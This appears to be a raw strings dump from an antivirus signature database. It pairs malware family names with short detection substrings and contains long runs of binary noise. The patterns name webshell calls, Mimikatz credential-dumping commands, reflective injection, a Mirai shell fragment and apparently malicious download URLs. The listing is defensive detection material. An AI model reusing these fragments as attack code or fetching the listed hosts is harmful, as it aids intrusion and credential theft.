!#TEL:Trojan:Win32/CredentialEnumerate.A !#TEL:Trojan:Win32/CredentialEnumerate.AIncludesAgePrevalence SuspCredEnumerateAttempt 85b33a91df71 RunsDestructiveCMDsParentBlock 85b39814a668 145b31b775a5c 145b384021860 145b3c1653207 145b3d72119cf a5b3c0f86962 (.+)\\ 31b35394a049 15b3af66e56b !#SLF:AGGREGATOR:CloudCleanToMoacTest DCO_MpDisableUefiRomReadForAMD !#SCRIPT:AmsiSigTrigger.A!alf alftestsig !#SCRIPT:AmsiSigTrigger.A!slf slftestsig !#SLF:Trojan:BAT/Cononfil.A slftestfilesig !#SCRIPT:AmsiSigTrigger.A!det concretetestsig !#SLF:AmsiTesting.E R!#SLF:AmsiTesting.E !#SLF:AmsiTesting.F S!#SLF:AmsiTesting.F !#SLF:AmsiTesting S!#SLF:AmsiTesting 554015fb9f4d 55405fe370af 5540a7c7f5c6 5540e237c343 55786f1de9e5 567825136fcf 57781eddd4c6 577826cb72f4 5b78d633e9d2 5f7808bc6576 6289d9d6481f 63783d85c3cd 63786022f661 6540b146a0af 6540d32a1740 66787bee04a0 667894b99f38 6978ae1a30ba 6978c5f61b99 6a61869e7bfe 6a7810c8123d 6c781663849e 6c78daf2f071 6e781991af77 6e78e59b6cb1 6f783a4c26b6 727894ae9903 78788969a601 7978a73e2bb8 PUA:Block:DownloadSponsor 7b7843bcbab6 7e78d8534f14 7f78113f5d6a 837811a6887c 8378554ffb41 8540ec23e44e 857878c253f0 86781c052888 867848552399 8c78f3706abe 8f78fe5a4f01 90613afccd79 9478ff483265 97786446d886 9778f2507efe 99789af9c609 9b78c0359972 9c78022fed20 9c787454c6c5 9d78074872ea a078f912b59f a278d32713ae a4781c419624 a540bf97a858 a64169d4f27b ab78604963c2 ac78d3c59386 af78395d7965 b4789c02f41f b5403759c924 b778d408aacd b878965b4c72 ba789b583b8d bd78ba183ff6 c0611f078eed c16156405bdc c7783d67ab9f cc7810ffed25 PUA:Block:SmartEngine:Bit d0789c5dec4d d278dddba3cb d3618bb49915 PUA:Block:YetAnotherMiner d378228685f1 e0782c13d3c4 e2780a6d1b70 ee787be72a89 f578c900c5f2 857826f3051c 857826f3051cIncludesHstrLuaLib maceExtract_Qakbot 14c786a262c04 16c7819128b3c PUA:Block:PremierOpinion 24c781e65a865 2f578f9a9870a 3ec787ad228ba ac3780f1be999 !#Lua:TEFRTPR.Func MpInternal_RichData_Ex MpKssTstKernel 1540168e6220 157822c88c4f 197810af244b 1b61eac9f1c5 1c786519e62c D,8}j 1gE- ut%+_V >wi}:\" AUb;a 2(T+[ >]G.bX C<}M[ i\\E\\? /-|7] GZm*dH N7sC2n- 0 W@G Ly-G2D qJqgY I?b#K +Or! :V>($ 2rj*X5 vP\\6# ?VG:5 dgoM{ #,\"&` @ju(P 7S(1+ Y^dnm xz_*W V2Zjd ye<;x `T\"8E4 B .|[wm pG+5 :}T(] \t<.dm l'8+? !0H&V* vU{qT)- 6SJ^V NyaI(o %J04K rJQ'1 ~Lq?y -v5h p8 @{_l@ ik=0T [IM0s ,2G`? ZdIUq# |1i#/; X7Ei] M+Q6m Y+cDM ~ BPp5 <GrF(3 C<&h- U]N'99 k3CJX YBQ}K ZTNsL yresB 5Vk5] >He{]u 'ohVnP 3}i Z O_cCP'O iG>AV \\GKbI h\tNV? -di2Z ~:{,| Ab/ rb-5F ;U7<* RZs]m xz n:E |YP^# WT(wX Et[V j#P~ 0! n%='1 kXmxP 35x p 7~JUF[ +7N>{ *zL4' 3e?l: +:9$>q5> na@eb|t YXfAz jHqU, &y%a' Uxh7 xnxOC (.+.php.+%a%a%a) %.(.*) 2db37a4cd935 socket.socket subprocess popen stdin stdout 21eb3f83fc602 BMLuaLib,ResearchData 21eb3f83fc602IncludesBMLuaLib,ResearchData /etc/ /home/ /opt/ T1486 SensitiveFileTampering 247b384d8bf93 247b384d8bf93IncludesBMLuaLib,ResearchData 314b348569dab 314b348569dabIncludesBMLuaLib,ResearchData SensitiveFilesOpen 69b3409d9e3c /([^/]+)$ /sbin/ /usr/bin/ /usr/sbin/ c9b35d4d4843 c9b35d4d4843IncludesResearchData ActionTagFileCreate 115b3d1bc668b 61b36e2fa75a fsockopen shell_exec passthru \tpassthru proc_open 79b34ee6b952 79b34ee6b952IncludesResearchData 67b3f29a29f9 -perm \twritable -name .fetchmailrc 21eb365e6b839 21eb365e6b839IncludesBMLuaLib,ResearchData c9b32748c3e6 c9b32748c3e6IncludesResearchData 131b375ea7f8d 131b375ea7f8dIncludesResearchData 159b364b8503f 159b364b8503fIncludesBMLuaLib,ResearchData /bash /run/yum.pid T1546.004 T1543.002 T1543 T1546 T1547.006 T1037.004 T1053.003 Persistence 3fb319815fd3 .json .yaml /boot/grub/ /var/run/ a5b3a4fc54ae %.[^%.]+$ b4b391f77877 b4b391f77877IncludesBMLuaLib 51b38e623522 -iname -iregex -regex /root/ !#Trojan:AutoIt/Nanocore.DA3!MTB )> !#Trojan:AutoIt/Nanocore.DA3!MTB =execute($ !#Trojan:PowerShell/Reflection.A )> !#Trojan:PowerShell/Reflection.A system.reflection !!#ALFPER:SCRIPT:Win32/Compesupp.A )>!!#ALFPER:SCRIPT:Win32/Compesupp.A {app}\\regwiz.exe !!#Lowfi:Exploit:SWF/FlappyMan.A-2 )>!!#Lowfi:Exploit:SWF/FlappyMan.A-2 infectedobjindex !!#Lowfi:Exploit:SWF/FlappyMan.A-4 )>!!#Lowfi:Exploit:SWF/FlappyMan.A-4 heapsprayobjaddr !!#Lowfi:Exploit:SWF/FlappyMan.A-5 )>!!#Lowfi:Exploit:SWF/FlappyMan.A-5 heapspraylenbyen !!#Lowfi:Exploit:SWF/FlappyMan.A-8 )>!!#Lowfi:Exploit:SWF/FlappyMan.A-8 findgadgetfailed !!#Python:LaZagne:jitsi_masterpass )>!!#Python:LaZagne:jitsi_masterpass jitsi_masterpass )>!!#SCPT:JS!Obfuscator.Split.CmdExe [\"exec\"](\"cmd.\"+ !!#SCPT:JS/Obfuscator.TEMPFolder.A )>!!#SCPT:JS/Obfuscator.TEMPFolder.A \"%temp\" !!#SCPT:O97M/ObfShellLaunch.F!amsi )>!!#SCPT:O97M/ObfShellLaunch.F!amsi @mshta !!#SCPT:Phish:PHP/Denyfromabuse.GG )>!!#SCPT:Phish:PHP/Denyfromabuse.GG denyfromabuse.ch !!#SCPT:Trojan:HTML/Phish.DRD1!MTB )>!!#SCPT:Trojan:HTML/Phish.DRD1!MTB !!#SCPT:Trojan:VBS/Obfuse.DRB5!MTB )>!!#SCPT:Trojan:VBS/Obfuse.DRB5!MTB f:f:f:f:f:f:f:f: !!#SCPT:Trojan:VBS/Obfuse.DRB8!MTB )>!!#SCPT:Trojan:VBS/Obfuse.DRB8!MTB .readtextsetswcu !!#SCPT:Trojan:VBS/Obfuse.RVA3!MTB )>!!#SCPT:Trojan:VBS/Obfuse.RVA3!MTB !!#SCPT:Win32API_ntcreateproc!amsi )>!!#SCPT:Win32API_ntcreateproc!amsi !!#SCPT:Win32API_regsetvaluew!amsi )>!!#SCPT:Win32API_regsetvaluew!amsi .regsetkeyvaluew !!#SCPT:Win32API_zwresumeproc!amsi )>!!#SCPT:Win32API_zwresumeproc!amsi !!#SCRIPT:Exploit:HTML/Meercat.I-3 )>!!#SCRIPT:Exploit:HTML/Meercat.I-3 publicstatistics !!#SCRIPT:JS/WithDotFunctionName.A )>!!#SCRIPT:JS/WithDotFunctionName.A )>!!#SCRIPT:PowerShell/Invoke-Apex.A invoke-uacbypass \"!#SCPT:Backdoor:PHP/Title_Sh3ll.GG )>\"!#SCPT:Backdoor:PHP/Title_Sh3ll.GG sh3ll \"!#SCPT:Backdoor:PHP/Title_Shell.GG )>\"!#SCPT:Backdoor:PHP/Title_Shell.GG \"!#SCPT:GeneralityExploitStrRare.AH )>\"!#SCPT:GeneralityExploitStrRare.AH \"!#SCPT:JS/Obfuscator.Split.Shell.A )>\"!#SCPT:JS/Obfuscator.Split.Shell.A .she'+'l \"!#SCPT:JsMethodFunc_xmlhttprequest )>\"!#SCPT:JsMethodFunc_xmlhttprequest xmlhttprequest( \"!#SCPT:Phish:PHP/Sharepoint_Css.GG )>\"!#SCPT:Phish:PHP/Sharepoint_Css.GG share-point.css \"!#SCPT:Trojan:JS/PdfjscRPF_ForEval )>\"!#SCPT:Trojan:JS/PdfjscRPF_ForEval for(eval( \"!#SCPT:Trojan:Java/Adwind.PJA4!MTB )>\"!#SCPT:Trojan:Java/Adwind.PJA4!MTB wsh.echo(nigraw \"!#SCPT:Win32API_rtlfillmemory!amsi )>\"!#SCPT:Win32API_rtlfillmemory!amsi \"!#SCRIPT:HTML/TechMsgFakeActions.F )>\"!#SCRIPT:HTML/TechMsgFakeActions.F threatsmanually \"!#SCRIPT:HTML/TechMsgFakeActions.K )>\"!#SCRIPT:HTML/TechMsgFakeActions.K toremoveviruses \"!#SCRIPT:PSExploitRunspaceAbuse.A3 )>\"!#SCRIPT:PSExploitRunspaceAbuse.A3 .invokeasync(); \"!#SCRIPT:Trojan:JS/Redirector.GL.2 )>\"!#SCRIPT:Trojan:JS/Redirector.GL.2 (\"%73%72%63\")]= \"!#Trojan:AutoIt/AgentTesla.SP5!MTB )>\"!#Trojan:AutoIt/AgentTesla.SP5!MTB \",\"regasm.exe\") \"!#Trojan:AutoIt/AutoInject.SJ5!MTB )>\"!#Trojan:AutoIt/AutoInject.SJ5!MTB bin_shellcode&= #!#ALF:HSTR:SoftwareBundler:Xiazai:2 )>#!#ALF:HSTR:SoftwareBundler:Xiazai:2 bkmg[(i)][(c)] #!#SCPT:Backdoor:ASP/Dirtelti.K5!MTB )>#!#SCPT:Backdoor:ASP/Dirtelti.K5!MTB request(\"cmd\") #!#SCPT:Backdoor:PHP/Dirtelti.C2!MTB )>#!#SCPT:Backdoor:PHP/Dirtelti.C2!MTB )>#!#SCPT:Exploit:JS/CVE-2009-1136.0.1 (\"%u0b0c%u0b0c #!#SCPT:GeneralityExploitStrCommon.H )>#!#SCPT:GeneralityExploitStrCommon.H use-after-free #!#SCPT:JS/Obfuscator.HexMixed.cmd.A )>#!#SCPT:JS/Obfuscator.HexMixed.cmd.A \\143\\155\\u0064 \\143\\u006d\\144 \\143\\u006d\\x64 \\143\\x6d\\u0064 \\u0063\\155\\144 \\u0063\\155\\x64 \\u0063\\x6d\\144 \\u0063\\x6d\\x64 \\x63\\155\\u0064 \\x63\\u006d\\144 \\x63\\u006d\\x64 \\x63\\x6d\\u0064 #!#SCPT:JS/Obfuscator.HexMixed.run.A )>#!#SCPT:JS/Obfuscator.HexMixed.run.A \\122\\165\\u006e \\122\\u0075\\156 \\122\\u0075\\x6e \\122\\x75\\u006e \\u0052\\165\\156 \\u0052\\165\\x6e \\u0052\\x75\\156 \\u0052\\x75\\x6e \\x52\\165\\u006e \\x52\\u0075\\156 \\x52\\u0075\\x6e \\x52\\x75\\u006e )>#!#SCPT:JS/Obfuscator.Reversed.var.A '','r','a','v' )>#!#SCPT:JS/Obfuscator.Split.length.A =\"en\"+\"g\"+\"t\"; #!#SCPT:JS/Obfuscator.Split.random.A )>#!#SCPT:JS/Obfuscator.Split.random.A 'andom' 'ra'+ 'ndom' 'ran'+ 'dom' 'rand'+ 'rando'+ #!#SCPT:O97M/CVE-2017-11882.RVJ2!MTB )>#!#SCPT:O97M/CVE-2017-11882.RVJ2!MTB equati/.native #!#SCPT:PowerShell/PasswordVault.HZ3 )>#!#SCPT:PowerShell/PasswordVault.HZ3 .retrieveall() #!#SCPT:Script/FileTypeMacro.A!Rttr9 )>#!#SCPT:Script/FileTypeMacro.A!Rttr9 thoracic2.docx #!#SCPT:Win32API_httpqueryinfoA!amsi )>#!#SCPT:Win32API_httpqueryinfoA!amsi .httpqueryinfo #!#SCRIPT:Exploit:JS/CVE-2013-3897-2 )>#!#SCRIPT:Exploit:JS/CVE-2013-3897-2 id_0.select(); #!#SCRIPT:Nemim_Encrypted_File!LowFi )>#!#SCRIPT:Nemim_Encrypted_File!LowFi minmei )>#!#SCRIPT:PowerShell/Mikatz!commands kerberos::hash kerberos::list lsadump::cache lsadump::trust #!#SCRIPT:Ransom:Win32/Stampado_Name )>#!#SCRIPT:Ransom:Win32/Stampado_Name Stampado_debug #!#Scpt:Phish:PHP/MalActorCyborg!MTB )>#!#Scpt:Phish:PHP/MalActorCyborg!MTB madebycyborg99 #!#Script:Phish:PHP/Phishmul.AD2!MTB )>#!#Script:Phish:PHP/Phishmul.AD2!MTB =\"--+createdby #!#Trojan:AutoIt/AgentTesla.SP15!MTB )>#!#Trojan:AutoIt/AgentTesla.SP15!MTB dim$startupdir #!#TrojanDownloader:HTML/HASHWinMin3 )>#!#TrojanDownloader:HTML/HASHWinMin3 miner.start(); )>#!#TrojanDownloader:Win32/Lnkget.gen .bat&echobye>> $!#SCPT:CodeOnly.ChromeSetNoSandbox.C )>$!#SCPT:CodeOnly.ChromeSetNoSandbox.C nosandboxtype )>$!#SCPT:JS/Obfuscator.HexMixed.http.A \\x68\\x74\\x74p \\x68\\x74t\\x70 \\x68t\\x74\\x70 h\\x74\\x74\\x70 $!#SCPT:Nemucod_exclusion.maindrawobj )>$!#SCPT:Nemucod_exclusion.maindrawobj |maindrawobj| $!#SCPT:Nemucod_exclusion.pixelheight )>$!#SCPT:Nemucod_exclusion.pixelheight |pixelheight| $!#SCRIPT:CmdFileOutputMultipleEcho.A )>$!#SCRIPT:CmdFileOutputMultipleEcho.A .bat&echoecho $!#SCRIPT:CmdFileOutputMultipleEcho.B )>$!#SCRIPT:CmdFileOutputMultipleEcho.B .cmd&echoecho $!#SCRIPT:Exploit:SWF/CVE-2014-0515-1 )>$!#SCRIPT:Exploit:SWF/CVE-2014-0515-1 displayshader $!#SCRIPT:TrojanDownloader:JS/Rusem.2 )>$!#SCRIPT:TrojanDownloader:JS/Rusem.2 paycrypt.like %!#Exploit:O97M/CVE-2017-11882.S!ats01 )>%!#Exploit:O97M/CVE-2017-11882.S!ats01 mshtahttp:// %!#SCPT:Backdoor:ASP/b374kShell.A2!MTB )>%!#SCPT:Backdoor:ASP/b374kShell.A2!MTB &shell_name& %!#SCPT:Trojan:PowerShell/WmiRemoter.G )>%!#SCPT:Trojan:PowerShell/WmiRemoter.G cim_datafile %!#SCPT:Trojan:Win32/PShellEnIEX!Sup02 )>%!#SCPT:Trojan:Win32/PShellEnIEX!Sup02 %!#SCPT:TrojanDownloader:JS/Rifrab.A.2 )>%!#SCPT:TrojanDownloader:JS/Rifrab.A.2 fff=op.split %!#SCPT:TrojanDownloader:VBS/Ledod.JJ2 )>%!#SCPT:TrojanDownloader:VBS/Ledod.JJ2 execute( %!#SCPT:TrojanDownloader:VBS/Ledod.JJ5 )>%!#SCPT:TrojanDownloader:VBS/Ledod.JJ5 (len( %!#TrojanDownloader:JS/Coropam.AA!ats3 )>%!#TrojanDownloader:JS/Coropam.AA!ats3 ='fucking47' %!#TrojanDownloader:JS/Donvibs.P!kma02 )>%!#TrojanDownloader:JS/Donvibs.P!kma02 {return![];} &!#Exploit:O97M/CVE-2017-11882.AV!ats01 )>&!#Exploit:O97M/CVE-2017-11882.AV!ats01 7h\\ol1oc~^9 &!#SCPT:CodeOnly.EnableMojoJsBindings.B )>&!#SCPT:CodeOnly.EnableMojoJsBindings.B enable_mojo &!#SCPT:EnvVarCharReplacement.EnvVarUse )>&!#SCPT:EnvVarCharReplacement.EnvVarUse ,1%=%temp%\" &!#SCPT:Exploit:O97M/CVE-2017-11882.YD4 )>&!#SCPT:Exploit:O97M/CVE-2017-11882.YD4 {\\bin000000 &!#SCPT:HackTool:PowerShell/AmsiContext )>&!#SCPT:HackTool:PowerShell/AmsiContext )>&!#SCPT:JS/Obfuscator.InnerScript.AAY.A +=';';e &!#SCPT:Phish:PHP/Domcheck_AtHotmail.GG )>&!#SCPT:Phish:PHP/Domcheck_AtHotmail.GG '@hotmail.' &!#SCPT:Phish:PHP/Domcheck_AtOutlook.GG )>&!#SCPT:Phish:PHP/Domcheck_AtOutlook.GG '@outlook.' &!#SCPT:Trojan:JS/PdfjscRPF_EvalThisDot )>&!#SCPT:Trojan:JS/PdfjscRPF_EvalThisDot =eval;this. &!#SCPT:TrojanDownloader:JS/Nemucod.IC1 )>&!#SCPT:TrojanDownloader:JS/Nemucod.IC1 +\".d\"+\"ll\"; &!#SCPT:TrojanDownloader:JS/Nemucod.JV7 )>&!#SCPT:TrojanDownloader:JS/Nemucod.JV7 293b0a20202 &!#SCPT:TrojanDownloader:JS/Nemucod.QK1 )>&!#SCPT:TrojanDownloader:JS/Nemucod.QK1 _hud_duck); &!#SCPT:TrojanDownloader:JS/Nemucod.RJ2 )>&!#SCPT:TrojanDownloader:JS/Nemucod.RJ2 \"][1 &!#SCPT:TrojanDownloader:JS/Nemucod.RN2 )>&!#SCPT:TrojanDownloader:JS/Nemucod.RN2 (){return\"\" &!#SCPT:TrojanDownloader:JS/Nemucod.SC5 )>&!#SCPT:TrojanDownloader:JS/Nemucod.SC5 )[/* &!#SCPT:TrojanDownloader:JS/Nemucod.SH3 )>&!#SCPT:TrojanDownloader:JS/Nemucod.SH3 =\"g\"+\"ety\"+ &!#SCPT:TrojanDownloader:JS/Nemucod:Z1c )>&!#SCPT:TrojanDownloader:JS/Nemucod:Z1c /*@cc_onvar &!#SCRIPT:Exploit:Win32/CVE-2015-1641-5 )>&!#SCRIPT:Exploit:Win32/CVE-2015-1641-5 d0cf11e0a1b &!#TEL:SCPT:Trojan:Win32/COMScriptlet.A )>&!#TEL:SCPT:Trojan:Win32/COMScriptlet.A feedacdc}\"> &!#TrojanDownloader:JS/Elshutilo.B!atb1 )>&!#TrojanDownloader:JS/Elshutilo.B!atb1 elifotevas. &!#TrojanDownloader:JS/Elshutilo.B!atb3 )>&!#TrojanDownloader:JS/Elshutilo.B!atb3 'teg'(nepo. &!#TrojanDownloader:JS/Nemucod.JN!atb01 )>&!#TrojanDownloader:JS/Nemucod.JN!atb01 .push(\",\"); &!#TrojanDropper:AutoIt/Obfusesd2!ptb02 )>&!#TrojanDropper:AutoIt/Obfusesd2!ptb02 #notrayicon '!#SCPT:TrojanDownloader:JS/Nemucod.BBO3 )>'!#SCPT:TrojanDownloader:JS/Nemucod.BBO3 savetofile '!#SCPT:TrojanDownloader:JS/Nemucod.BMT3 )>'!#SCPT:TrojanDownloader:JS/Nemucod.BMT3 .eval( '!#SCPT:TrojanDownloader:JS/Sumak!8fa6_4 )>'!#SCPT:TrojanDownloader:JS/Sumak!8fa6_4 case\"gtfo\" '!#SCPT:TrojanDownloader:Java/Banload.L2 )>'!#SCPT:TrojanDownloader:Java/Banload.L2 pintebinha '!#SCPT:TrojanDownloader:Java/Banload.Q2 )>'!#SCPT:TrojanDownloader:Java/Banload.Q2 erk,useros '!#SCPT:TrojanDownloader:O97M/Qakbot.SZ1 )>'!#SCPT:TrojanDownloader:O97M/Qakbot.SZ1 openddddbp '!#SCPT:TrojanDownloader:O97M/Qakbot.SZ2 )>'!#SCPT:TrojanDownloader:O97M/Qakbot.SZ2 shell32-dd '!#SCPT:TrojanDownloader:VBS/Banload.BT2 )>'!#SCPT:TrojanDownloader:VBS/Banload.BT2 33300)uac( '!#SCPT:TrojanDownloader:VBS/Donvibs.SS3 )>'!#SCPT:TrojanDownloader:VBS/Donvibs.SS3 fsdfdsfs=\" (!#SCPT:Linux/Trojan.mal_attr_ExecFromTmp )>(!#SCPT:Linux/Trojan.mal_attr_ExecFromTmp exec/tmp/ (!#SCPT:TrojanDownloader:JS/Swabfex_emu_1 )>(!#SCPT:TrojanDownloader:JS/Swabfex_emu_1 555D555E0 (!#SCPT:TrojanDownloader:O97M/Slinjek.AJ1 )>(!#SCPT:TrojanDownloader:O97M/Slinjek.AJ1 auto_open (!#TEL:Exploit:O97M/CVE-2017-11882.ZA!MTB )>(!#TEL:Exploit:O97M/CVE-2017-11882.ZA!MTB {\\rtf5459 )!#SCPT:Exploit:SWF/CVE-2018-4878.findfunc )>)!#SCPT:Exploit:SWF/CVE-2018-4878.findfunc findfunc )!#SCPT:Exploit:SWF/CVE-2018-4878.method_1 )>)!#SCPT:Exploit:SWF/CVE-2018-4878.method_1 method_1 )!#SCPT:Exploit:SWF/CVE-2018-4878.method_2 )>)!#SCPT:Exploit:SWF/CVE-2018-4878.method_2 method_2 )!#SCPT:Exploit:SWF/CVE-2018-4878.method_5 )>)!#SCPT:Exploit:SWF/CVE-2018-4878.method_5 method_5 )!#SCPT:TrojanDownloader:O97M/Zloader.STO1 )>)!#SCPT:TrojanDownloader:O97M/Zloader.STO1 c:\\orwkw )!#Script:Trojan:JS/NemuKryptikDow.AD!MTB7 )>)!#Script:Trojan:JS/NemuKryptikDow.AD!MTB7 .type=1; )!#Script:Trojan:JS/NemuKryptikDow.AD!MTB8 )>)!#Script:Trojan:JS/NemuKryptikDow.AD!MTB8 .open(); *!#SCPT:TrojanDownloader:HTML/Genbhv.MZ!ex2 )>*!#SCPT:TrojanDownloader:HTML/Genbhv.MZ!ex2 &\".exe\" \t&\".exe\" *!#SCPT:TrojanDownloader:VBS/Obfuse.PV2!MTB )>*!#SCPT:TrojanDownloader:VBS/Obfuse.PV2!MTB array(\" \tarray(\" *!#SCPT:TrojanDownloader:VBS/Qakbot.SS3!MTB )>*!#SCPT:TrojanDownloader:VBS/Qakbot.SS3!MTB \texecute +!#SCPT:Exploit:O97M/CVE-2017-8570.AR!MTB!R5 )>+!#SCPT:Exploit:O97M/CVE-2017-8570.AR!MTB!R5 http30 +!#SCPT:TrojanDownloader:O97M/IcedId.MS1!MTB )>+!#SCPT:TrojanDownloader:O97M/IcedId.MS1!MTB jjccbb +!#SCPT:TrojanDownloader:O97M/IcedId.MX1!MTB )>+!#SCPT:TrojanDownloader:O97M/IcedId.MX1!MTB ,!#SCPT:TrojanDownloader:HTML/Phish.ZHVF1!MTB )>,!#SCPT:TrojanDownloader:HTML/Phish.ZHVF1!MTB <form ,!#SCPT:TrojanDownloader:O97M/Obfuse.PKV6!MTB )>,!#SCPT:TrojanDownloader:O97M/Obfuse.PKV6!MTB wnloa ,!#SCPT:TrojanDownloader:O97M/Obfuse.PKV9!MTB )>,!#SCPT:TrojanDownloader:O97M/Obfuse.PKV9!MTB dtruh ,!#SCPT:TrojanDownloader:O97M/Qakbot.PJI6!MTB )>,!#SCPT:TrojanDownloader:O97M/Qakbot.PJI6!MTB -!#SCPT:TrojanDownloader:O97M/Encdoc.AVB34!MTB )>-!#SCPT:TrojanDownloader:O97M/Encdoc.AVB34!MTB !#MacOS_Pirrit2 vardg=document[a0b('0x16' %vardg=document[a0b('0x16' script' !#SCPT:LetmeinAG write-debug\"downloadi $write-debug\"downloadi gthemtrpl\" !#SCPT:LetmeinAR write-verbose\"execu $write-verbose\"execu ingthemtrpl\" leaker_addr=null; $leaker_addr=null; leaker={a:{}}; !#SLF:PS/JoinIEX =(-join$ $=(-join$ )-join'';$ |&(gali*x) !#BM_WMI_MOF_FILE #pragma ##pragma \"\\\\x90 !#SCPT:JS:Zheg.O2 =parseint( #=parseint( get-command-module7zip4powershell #get-command-module7zip4powershell !#SCPT:Wannamine2 new-object-comobjectwscript.shell #new-object-comobjectwscript.shell !#SCRIPT:Mavil.B4 /loader/load.php?bid= #/loader/load.php?bid= &hwid= !#SCPT:JS.Chrext.2 \\x61\\x67\\x61\\x6d\\x65\\x6e\\x74\\x6f \"\\x61\\x67\\x61\\x6d\\x65\\x6e\\x74\\x6f !#SCPT:JS.Chrext.4 \\x69\\x6e\\x61\\x6c\\x69\\x7a\\x61\\x72 \"\\x69\\x6e\\x61\\x6c\\x69\\x7a\\x61\\x72 !#SCPT:Lafavloz.A1 antibotkill=\"antibotkill \"antibotkill=\"antibotkill \"then !#SCPT:Nemucod.DI1 \"+\"\\x61\"+\"rat\"]( \"\"+\"\\x61\"+\"rat\"]( ;function !#SCPT:PHPShell.A4 opjudovg}{;#)tutjyf`opjudovg)!gj \"opjudovg}{;#)tutjyf`opjudovg)!gj !#SCPT:RemThread.1 ntcreatethreadex.invoke \"ntcreatethreadex.invoke 1fffff !#SCPT:Rundll_path c:\\windows\\system32\\rundll32.exe \"c:\\windows\\system32\\rundll32.exe !#SCPT:Webshell.V1 phpcodeinjection||exploitbyi-hmx \"phpcodeinjection||exploitbyi-hmx !#SCPT:Webshell.V4 payload=base64_encode(\"passthru( \"payload=base64_encode(\"passthru( !#SCRIPT:ConsoleIn [console]::treatcontrolcasinput= \"[console]::treatcontrolcasinput= $pshome[ \"$pshome[ ]+'x' $shellid[ \"$shellid[ ]+$shellid[ ]+'x') |foreach \"|foreach {([int]$_-as[char])}) !#SCPT:Goopisung.A3 https://storage.googleapis.com/ !https://storage.googleapis.com/ !https:// ` @.dll ` http://fmforums.com/wggx991264/ !http://fmforums.com/wggx991264/ !#SCPT:OKMSBypass.E !create @binpath= @\\srvany.exe !#SCPT:PS/Powdow.A3 esrever::]yarra[;)(yarrarahcot. !esrever::]yarra[;)(yarrarahcot. !#SCPT:WannamineWMI root\\default:systemcore_updater !root\\default:systemcore_updater !#SCRIPT:PsObfus.A2 |convertto-securestring !|convertto-securestring )|iex /id[(\\\\ueph1u)(\\n032n@j)]/info /id[(\\\\ueph1u)(\\n032n@j)]/info !#SCPT:EvalProtector innerhtml.indexof(\"top[0].eval innerhtml.indexof(\"top[0].eval !#SCPT:GPhishMessage target=\"_blank\">openindocs</a> target=\"_blank\">openindocs</a> !#SCPT:JS/Nemucod.A2 replace\"\"indexof\"\"fromcharcode replace\"\"indexof\"\"fromcharcode !#SCPT:Nemucod.BAE1b /welcomemarketing.ie/counter/? /welcomemarketing.ie/counter/? !#SCPT:Obfuscploit:0 \\d]+.[\\d]+.[\\d]+/))==null){var \\d]+.[\\d]+.[\\d]+/))==null){var !#SCPT:Obfuscploit:1 l){window[string.fromcharcode( l){window[string.fromcharcode( !#SCPT:VBS/Obfus.BS2 .run &\"'\"& !#SCPT:wmitaskill.A3 createobject( createobject( taskkill !#AnalysisProcName.A1 frida-winjector-helper-64.exe !#AnalysisProcName.A2 frida-winjector-helper-32.exe !#SCPT:AADKillchain.C invoke-userenumerationasguest yp=[];try{pqbt !#SCPT:OffRelHttp.gen relationships/ %target=\"http !#SCPT:PaypalPhish.H2 islamicstate=caliphateislamic !#SCPT:powinvokeiex.A [convert]:: !#Script:Unscapetob64 document.write(atob(unescape( style= fontsize:0px href= !#Trojan:VBA/Calboco1 https://www.dfib.net/calc.exe !#Worm:JS/Proslikefan function( !#//SCPT:Wakelock_Perm android.permission.wake_lock !#//SCPT:WriteSms_Perm android.permission.write_sms \"jj83__11\".replace('_','7'); !#PWS:AutoIt/Passup.A1 fileinstall(\"autoupdate.au3. !#PWS:AutoIt/Passup.A2 execute(binarytostring(\"0x45 !#SCPT:AssertPostinTag assert($_post[ !#SCPT:ClnWordsCat3_10 encryptingyournextcloudfiles !#SCPT:ClnWordsCat3_17 passphrasestorageandrecovery !#SCPT:EXT:Imposter.N1 https://api.edgelauncher.com !#SCPT:Java/Banload.A3 getruntime /cds/ !#SCPT:PDF.OnlyOnePage </type/pages/kids /count1/ /count1> !#SCPT:VBS:Suspb64Run1 /defender.txt\" @.open\"get\", !#SCRIPT:JS/Msfdbrow.3 .send(\"irb-e\\\"\"+ +\"\\\"\\n\"); !#SCRIPT:RefPeInject.A invoke-reflectivepeinjection !#Trojan:HTML/Emrhish2 bankdraftof withfedexemail !#PUA:Block:Bundlore.I3 open\"${volpath}/install.app !#PUA:MacOS/MacShiny.A3 #!/bin/shecho\"pkgpoolfiller !#SCPT:Adodb.vbshttpzip \"http 0.zip\" !#SCPT:HTML/Phish.SBLN5 letarr=json.parse(atob(s)); !#SCPT:JS/Banloadr.temp function(){/*%temp%*/}.$(); !#SCPT:NodeJS!websocket require('websocket').server dugedepap.ru/ !#SCPT:PSByteShellcodeC byte[] P=newbyte[ get-processlistingwmimplant !#SCRIPT:BAT/Chopper.A2 ipconfig/all >c:\\windows\\ !#SCRIPT:JS/Makdichi.A1 session.putvalue(\" !#SCRIPT:PS/AmsiFail.A3 .marshal]::( @[char]( !#SCRPT:O97M/Qakbot.AR1 http://stroylux.ro/ds/1.gif !#Trojan:JS/Flafisi.D.1 /flash player .jse';var !#Trojan:Linux/Mirai.D1 /bin/shulimit-n99999cd/tmp; !#Trojan:Linux/Setag.B3 /usr/binfunctiondownloadyam _.H$A :LO\\p <Q@v#lt =&mdH 1f;~U =gHvY \"G$T ,2 Jrb!E \"/|t5 $1O{\t kwm,tx }WBqz /Kd*M IcWY`l l+{]f| =uydc M;!b? b\t/dh >O \to 0i %j9 ]T'WW !!G7H 8 ZV P%Fj[ SrN > *z^PL +|:_* [@#3v% `>L:3G /ireF BVlH.P NV(bu S/5}] CWrQ| WX)!9 N<BvQ[zkDZ Y\"z.$ $/sPo{),~b 8:9S+ L,A?? J#HLr <b@{ K<h+Q o/yTs cLg3F NaPmE 4=$eD Na,Zi P,wvv Tm'^A FI}]O IDNi VrcL?[ TTnPA oMGd} 991T( mH\\8E B8pZ# >Pr~H =^f`5 a=E31 !#AGG:JS/Obfuscator.Spltra.C |!#AGG:AllowList:Win32/WinGuido.A |!#ALF:Trojan:Win32/Cassini.A!ibtg |!#ALF:Trojan:Win32/Cassini.A!ibt !#ALF:Trojan:PowerShell/PSAttack.B!MTB &v!#ALF:Trojan:PowerShell/PSAttack.B!MTB !#ALF:Trojan:Win32/Cassini_903acaaa!ibt 'u!#ALF:Trojan:Win32/Cassini_903acaaa!ibt !#ALF:Trojan:Win32/Cassini_a0573ed7!ibt 'u!#ALF:Trojan:Win32/Cassini_a0573ed7!ibt !#ALF:Trojan:Win32/Cassini_b6efd62c!ibt 